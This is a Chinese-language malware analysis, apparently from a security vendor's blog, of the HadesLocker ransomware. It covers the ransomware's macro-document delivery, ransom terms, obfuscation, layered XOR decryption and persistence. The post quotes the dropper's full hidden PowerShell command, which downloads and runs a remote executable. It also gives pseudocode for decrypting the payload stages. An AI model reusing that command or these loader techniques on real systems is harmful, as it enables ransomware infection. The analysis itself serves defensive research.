近日哈勃分析系统捕获到一类由C#语言编写的新的敲诈勒索木马。之前出现 的C#语言编写的木马只是简单地调用了一些C#库来辅助开发。与之相比,这次的变种增加了多层嵌套解密、动态反射调用 等复杂手段,外加多种混淆技术, 提升了分析难度。
木马加密文件时使用AES256算法, 在特定条件下可以还原加密的文件。
背景简介:
HadesLocker是10月份新爆发的一个敲诈勒索类木马,会加密用户 特定后缀名的文件,包括本地驱动器和网络驱动器, 加密后文件后缀为.~HL外加5个 随机字符,然后生成txt,html、png三种形式的文件来通知用户支付 赎金,桌面背景也会被改为生成的png文件。
打开支付赎金的网站可以看到,用户必须支付1比特币的赎金才能获取解密 密码,并且如果在规定的时间内没有支付,赎金价格将升至2比特币 。在该网站上,木马作者将其命名为HadesLocker。此网站域名为俄罗斯顶级域名ru,无法查询到进一步的注册信息。
样本分析:
原始传播文件依然延续了最近的趋势,使用宏文档进行传播,打开文档之后运行宏会 启动powershell命令,下载木马主体并且运行 :
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://185.*.*.66/update.exe','C:\Users\ADMINI~1\AppData\Local\Temp\update345.exe'); Start-Process('C:\Users\ADMINI~1\AppData\Local\Temp\update345.exe')
其中的下载IP经查询来自荷兰。
下载到的update345.exe是一个rar自解压 包,打开后可以看到包含3个文件, 其中一个exe是木马启动入口,另外两个文件均是一些二进制数据。
Osiyykss.exe是一个C#程序,所有 的源码都经过了混淆,主要包括函数名与变量名混淆 ,执行流程混淆,外加垃圾指令等。
例如下面是其中一个较为简单的被混淆的方法:
可以看到混淆形式如下:
while(true)
{
switch()
case 1:
case 2:
……
}
使用其中硬编码的一些大数常量,然后 通过各种运算决定进哪个执行分支,以此 混淆执行流。因此后面可以看到,本文几乎所有截图中的代码 基本都在某个switch的case里。外加所有的字符串都是动态解密的,这 对静态分析造成了很大困扰,所以主要需要依靠动态调试这个样本。
Osiyykss.exe分析:
Osiyykss.exe启动后首先读取压缩包内的另一个文件Krrxoeoaonmsiyyk.png, 并且开始解密:
Krrxoeoaonmsiyyk.png解密后是一个C#程序集,解密 方法不算复杂,使用固定的字符串“Dlghooxwxclesvxamv” 为key,然后顺序异或加密。由此可得到 解密算法为:
For i in FileSize:
FileBytes[i] ^= Key[ i % KenLen ];
解密后的程序集是这样的:
解密后Osiyykss.exe使用延迟绑定技术动态调用 这个名为”IE”的程序集:
IE程序集:
首先木马将自身复制到AppData\Roaming\wow6232node目录 下,此目录名怀疑是模仿系统中常见的WOW6432Node的名称。
然后创建一个快捷方式,指向wow6232node目录下的 新文件,并且将快捷方式设置为自启动项。
接下来读取压缩包的另一个文件Senagxehdojk.xml,并且调用IE:PolyDecrypt开始解密 ,解密的key与之前解密IE程序集的key一样 ,但是解密方法略有不同,解密算法大意如下:
For i in FileSize*2:
FileBytes[i % FileSize] = (BYTE)(((int)((FileBytes[i % FileSize] ^ Key[i % KeyLen]) - FileBytes[(i + 1) % FileSize]) + 256) % 256);
Senagxehdojk.xml解密后为另一个程序集S oftware,这个程序集才是敲诈木马实现 加密勒索的主要程序集,但木马十分狡猾,并没有直接调用该程序集。
发表评论